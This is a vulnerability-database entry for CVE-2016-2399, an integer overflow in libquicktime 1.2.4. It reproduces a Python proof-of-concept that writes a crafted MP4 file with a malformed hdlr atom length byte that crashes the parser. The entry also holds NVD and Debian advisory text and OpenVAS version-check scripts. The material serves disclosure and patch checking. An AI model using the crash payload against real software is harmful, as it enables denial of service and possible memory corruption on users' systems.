ID EXPLOITPACK:AEC709AE31509661B7175A6940E4603D Type exploitpack Reporter Marco Romano Modified 2016-02-23T00:00:00
Description
libquicktime 1.2.4 - Integer Overflow
#!/usr/bin/env python
#
###
# - 7 February 2016 -
# My last bug hunting session (*for fun and no-profit*)
# has been dedicated to libquicktime
###
#
# Author: Marco Romano - @nemux_ http://www.nemux.org
# libquicktime 1.2.4 Integer Overflow
#
# Product Page: http://libquicktime.sourceforge.net/
# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
# Affected products: All products using libquicktime version <= 1.2.4
#
# CVE-ID: CVE-2016-2399
#
# Disclosure part: http://www.nemux.org
#
########
####### Timeline
#
# 07 Feb 2016 Bug discovered
# 17 Feb 2016 Mitre.org contacted
# 17 Feb 2016 Disclosed to the project's maintainer
# 23 Feb 2016 No response from the maintainer
# 23 Feb 2016 Publicly disclosed
#
########
####### References
#
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
# http://libquicktime.sourceforge.net/
# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html
# https://en.wikipedia.org/wiki/QuickTime_File_Format
#
#######
#
# DISCLAIMER: It's just a PoC... it will crash something
#
####
import sys
import struct
import binascii
"""
There needs to be an mp4 file with these nested atoms to trigger the bug:
moov -> trak -> mdia -> hdlr
"""
# Hex image of the sample file, split into labelled segments and joined before
# decoding. The container tags are plain ASCII ('moov', 'trak', 'mdia',
# 'hdlr'); the segments between them are reproduced unchanged.
hax0r_mp4 = bytearray(binascii.unhexlify("".join((
    # 'ftyp' and 'mdat' atoms, then the 4-byte size that precedes 'moov'
    "0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1",
    "6D6F6F76",  # 'moov' container tag
    "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000",
    "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000",
    "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175",
    "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000",
    "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000",
    "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000",
    "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF",
    "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4",
    "7472616B",  # 'trak' container tag
    "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000",
    "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040",
    "6D646961",  # 'mdia' container tag
    "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000",
    "4E",  # low byte of the size field in front of 'hdlr' (0x4E = 78)
    "68646C72",  # 'hdlr' tag
    "0000000000",
    "4141414141414141",  # eight 0x41 ('A') bytes; the author's marker region
    "0000000000000000000000",
    # 0xEC = 236: a one-byte length above 127, so it becomes negative when it
    # is read into a signed char (the author's "change in signedness").
    # NOTE(review): the NVD text for CVE-2016-2399 places the flaw in
    # quicktime_read_pascal, so this is presumably the Pascal-string length
    # byte -- confirm against the library source. A robust parser rejects a
    # length that exceeds the bytes remaining in the enclosing atom.
    "EC",
    "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010",
))))
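def createPoC():
    """Write the malformed sample held in ``hax0r_mp4`` to ``./nemux.mp4``.

    The output is a crash-reproduction sample for CVE-2016-2399. The Debian
    advisories quoted on this page give 2:1.2.4-3+deb7u1, 2:1.2.4-7+deb8u1
    and 2:1.2.4-10 as the fixed libquicktime package versions, so the file
    can serve as a regression input when checking that an installed build
    carries the fix.

    Returns:
        None. The outcome is reported on stdout; errors are printed rather
        than raised, as in the original script.
    """
    try:
        # Relative path: the file is created in the current working
        # directory, and an existing nemux.mp4 there is overwritten.
        with open("./nemux.mp4", "wb") as output:
            output.write(hax0r_mp4)
    except Exception as e:  # "as" form is valid on Python 2.6+ and Python 3
        print(str(e))
        print("[*] mmmm!")
    else:
        # Reported only after the with-block has closed the file, so a
        # failure while flushing or closing is not announced as success.
        print("[*] The PoC is done!")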
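def usage():
    """Print a short help text and terminate the interpreter.

    The script name shown in the text is taken from ``sys.argv[0]``.

    Raises:
        SystemExit: always, through ``sys.exit()`` called without a status.
    """
    script = sys.argv[0]
    # Single-argument print(...) calls behave the same on Python 2 and 3.
    print("\nUsage? Run it -> " + script)
    print("this poc creates an mp4 file named nemux.mp4")
    print("--------------------------------------------")
    print("This dummy help? " + script + " help\n")
    sys.exit()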
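if __name__ == "__main__":
    # Exactly one command-line argument (for example "help") shows the usage
    # text; any other argument count prints the banner and writes the sample
    # file through createPoC().
    try:
        if len(sys.argv) == 2:
            usage()
        else:
            print("\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n")
            print("Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n")
            createPoC()
    except Exception as e:  # SystemExit from usage() is not caught here
        print(str(e))
        print("Ok... Something went wrong...")
        # Non-zero status so a calling shell or test harness sees the failure.
        sys.exit(1)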
{"lastseen": "2020-04-01T19:05:59", "references": [], "description": "\nlibquicktime 1.2.4 - Integer Overflow", "edition": 1, "reporter": "Marco Romano", "exploitpack": {"type": "dos", "platform": "multiple"}, "published": "2016-02-23T00:00:00", "title": "libquicktime 1.2.4 - Integer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-2399"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135899"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-1986-1.NASL", "DEBIAN_DSA-3800.NASL", "SUSE_SU-2017-0610-1.NASL", "DEBIAN_DLA-844.NASL", "OPENSUSE-2017-288.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:703800", "OPENVAS:1361412562310703800", "OPENVAS:1361412562310890844"]}, {"type": "debian", "idList": ["DEBIAN:DLA-844-1:470FD", "DEBIAN:DSA-3800-1:6B4DD"]}, {"type": "zdt", "idList": ["1337DAY-ID-25845"]}, {"type": "exploitdb", "idList": ["EDB-ID:39487"]}], "modified": "2020-04-01T19:05:59", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-04-01T19:05:59", "rev": 2}, "vulnersScore": 6.8}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "id": "EXPLOITPACK:AEC709AE31509661B7175A6940E4603D", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/env python\n#\n###\n# - 7 February 2016 -\n# My last bug hunting session (*for fun and no-profit*) \n# has been dedicated to libquicktime\n###\n# \n# Author: Marco Romano - @nemux_ http://www.nemux.org\n# libquicktime 1.2.4 Integer Overflow\n#\n# Product Page: http://libquicktime.sourceforge.net/\n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow\n# Affected products: All products using libquicktime version <= 1.2.4\n#\n# CVE-ID: CVE-2016-2399 \n#\n# Disclosure part: http://www.nemux.org\n#\n########\n####### Timeline\n#\n# 07 Feb 2016 Bug discovered\n# 17 Feb 2016 Mitre.org contacted\n# 17 Feb 2016 Disclosed to the project's maintainer\n# 23 Feb 2016 No response from the 
maintainer\n# 23 Feb 2016 Publicly disclosed \n#\n########\n####### References\n#\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399\n# http://libquicktime.sourceforge.net/\n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format\n#\n#######\n#\n# DISCLAIMER: It's just a PoC... it will crash something\n#\n#### \nimport sys\nimport struct\nimport binascii\n\n\"\"\"\nThere needs to be an mp4 file with these nested atoms to trigger the bug:\nmoov -> trak -> mdia -> hdlr\n\"\"\"\nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\" \n \"6D6F6F76\" #### moov atom\n \"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\"\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\" \n \"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\"\n \"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\"\n \"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\" \n \"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\" \n \"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\" \n \"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\"\n \"7472616B\" #### trak atom\n \"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\"\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\"\n \"6D646961\" #### mdia atom\n \"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\"\n \"4E\" #### hdlr atom length\n \"68646C72\" #### hdlr atom\n \"0000000000\"\n \"4141414141414141\" #### our airstrip :)\n \"0000000000000000000000\" \n \"EC\" 
#### 236 > 127 <-- overflow here and a change in signedness too\n \"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\")\n\nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))\n\ndef createPoC():\n try:\n with open(\"./nemux.mp4\",\"wb\") as output:\n output.write(hax0r_mp4)\n print \"[*] The PoC is done!\"\n except Exception,e: \n print str(e)\n print \"[*] mmmm!\"\n\ndef usage():\n print \"\\nUsage? Run it -> \" + sys.argv[0]\n print \"this poc creates an mp4 file named nemux.mp4\"\n print \"--------------------------------------------\"\n print \"This dummy help? \" + sys.argv[0] + \" help\\n\" \n sys.exit()\n\nif __name__ == \"__main__\":\n try:\n if len(sys.argv) == 2:\n usage()\n else:\n print \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\"\n print \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\";\n createPoC();\n except Exception,e: \n print str(e)\n print \"Ok... Something went wrong...\"\n sys.exit()", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}
{"cve": [{"lastseen": "2021-02-02T06:28:04", "description": "Integer overflow in the quicktime_read_pascal function in libquicktime 1.2.4 and earlier allows remote attackers to cause a denial of service or possibly have other unspecified impact via a crafted hdlr MP4 atom.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-30T22:59:00", "title": "CVE-2016-2399", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2399"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/a:libquicktime:libquicktime:1.2.4"], "id": "CVE-2016-2399", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2399", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:libquicktime:libquicktime:1.2.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-01-29T20:08:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "description": "Marco ", "modified": "2020-01-29T00:00:00", "published": "2018-01-12T00:00:00", "id": "OPENVAS:1361412562310890844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890844", "type": "openvas", "title": 
"Debian LTS: Security Advisory for libquicktime (DLA-844-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890844\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-2399\");\n script_name(\"Debian LTS: Security Advisory for libquicktime (DLA-844-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-12 00:00:00 +0100 (Fri, 12 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00000.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"libquicktime on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\");\n\n script_tag(name:\"summary\", value:\"Marco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libquicktime-dev\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libquicktime-doc\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libquicktime2\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"quicktime-utils\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"quicktime-x11utils\", ver:\"2:1.2.4-3+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "description": "Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. 
When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.", "modified": "2019-03-18T00:00:00", "published": "2017-03-02T00:00:00", "id": "OPENVAS:1361412562310703800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703800", "type": "openvas", "title": "Debian Security Advisory DSA 3800-1 (libquicktime - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3800.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3800-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703800\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-2399\");\n script_name(\"Debian Security Advisory DSA 3800-1 (libquicktime - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-02 00:00:00 +0100 (Thu, 02 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3800.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"libquicktime on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:1.2.4-10.\n\nWe recommend that you upgrade your libquicktime packages.\");\n script_tag(name:\"summary\", value:\"Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. 
When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libquicktime-dev\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libquicktime-doc\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libquicktime2\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"quicktime-utils\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"quicktime-x11utils\", ver:\"2:1.2.4-7+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:57:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "description": "Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. 
When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.", "modified": "2017-07-07T00:00:00", "published": "2017-03-02T00:00:00", "id": "OPENVAS:703800", "href": "http://plugins.openvas.org/nasl.php?oid=703800", "type": "openvas", "title": "Debian Security Advisory DSA 3800-1 (libquicktime - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3800.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3800-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703800);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2016-2399\");\n script_name(\"Debian Security Advisory DSA 3800-1 (libquicktime - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-03-02 00:00:00 +0100 (Thu, 02 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3800.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libquicktime on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:1.2.4-10.\n\nWe recommend that you upgrade your libquicktime packages.\");\n script_tag(name: \"summary\", value: \"Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. 
When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libquicktime-dev\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libquicktime-doc\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libquicktime2\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"quicktime-utils\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"quicktime-x11utils\", ver:\"2:1.2.4-7+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:20", "description": "", "published": "2016-02-23T00:00:00", "type": "packetstorm", "title": "libquicktime 1.2.4 Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "id": "PACKETSTORM:135899", "href": "https://packetstormsecurity.com/files/135899/libquicktime-1.2.4-Integer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n# \n### \n# - 7 February 2016 - \n# My last bug hunting session (*for fun and no-profit*) \n# has been dedicated to libquicktime \n### \n# \n# Author: Marco Romano - @nemux_ http://www.nemux.org \n# libquicktime 1.2.4 Integer Overflow \n# \n# Product Page: http://libquicktime.sourceforge.net/ \n# Description: 'hdlr', 'stsd', 
'ftab' MP4 Atoms Integer Overflow \n# Affected products: All products using libquicktime version <= 1.2.4 \n# \n# CVE-ID: CVE-2016-2399 \n# \n# Disclosure part: http://www.nemux.org \n# \n######## \n####### Timeline \n# \n# 07 Feb 2016 Bug discovered \n# 17 Feb 2016 Mitre.org contacted \n# 17 Feb 2016 Disclosed to the project's maintainer \n# 23 Feb 2016 No response from the maintainer \n# 23 Feb 2016 Publicly disclosed \n# \n######## \n####### References \n# \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399 \n# http://libquicktime.sourceforge.net/ \n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format \n# \n####### \n# \n# DISCLAIMER: It's just a PoC... it will crash something \n# \n#### \nimport sys \nimport struct \nimport binascii \n \n\"\"\" \nThere needs to be an mp4 file with these nested atoms to trigger the bug: \nmoov -> trak -> mdia -> hdlr \n\"\"\" \nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\" \n\"6D6F6F76\" #### moov atom \n\"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\" \n\"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\" \n\"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\" \n\"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\" \n\"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\" \n\"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\" \n\"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\" \n\"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\" \n\"7472616B\" #### trak atom 
\n\"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\" \n\"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\" \n\"6D646961\" #### mdia atom \n\"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\" \n\"4E\" #### hdlr atom length \n\"68646C72\" #### hdlr atom \n\"0000000000\" \n\"4141414141414141\" #### our airstrip :) \n\"0000000000000000000000\" \n\"EC\" #### 236 > 127 <-- overflow here and a change in signedness too \n\"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\") \n \nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4)) \n \ndef createPoC(): \ntry: \nwith open(\"./nemux.mp4\",\"wb\") as output: \noutput.write(hax0r_mp4) \nprint \"[*] The PoC is done!\" \nexcept Exception,e: \nprint str(e) \nprint \"[*] mmmm!\" \n \ndef usage(): \nprint \"\\nUsage? Run it -> \" + sys.argv[0] \nprint \"this poc creates an mp4 file named nemux.mp4\" \nprint \"--------------------------------------------\" \nprint \"This dummy help? \" + sys.argv[0] + \" help\\n\" \nsys.exit() \n \nif __name__ == \"__main__\": \ntry: \nif len(sys.argv) == 2: \nusage() \nelse: \nprint \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\" \nprint \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\"; \ncreatePoC(); \nexcept Exception,e: \nprint str(e) \nprint \"Ok... Something went wrong...\" \nsys.exit() \n \n \n \n`\n", "cvss": {"score": 5.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:LOW/I:LOW/A:LOW/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135899/libquicktime_CVE-2016-2399-PoC.py.txt"}], "exploitdb": [{"lastseen": "2016-02-24T19:47:32", "description": "libquicktime 1.2.4 - Integer Overflow. CVE-2016-2399. 
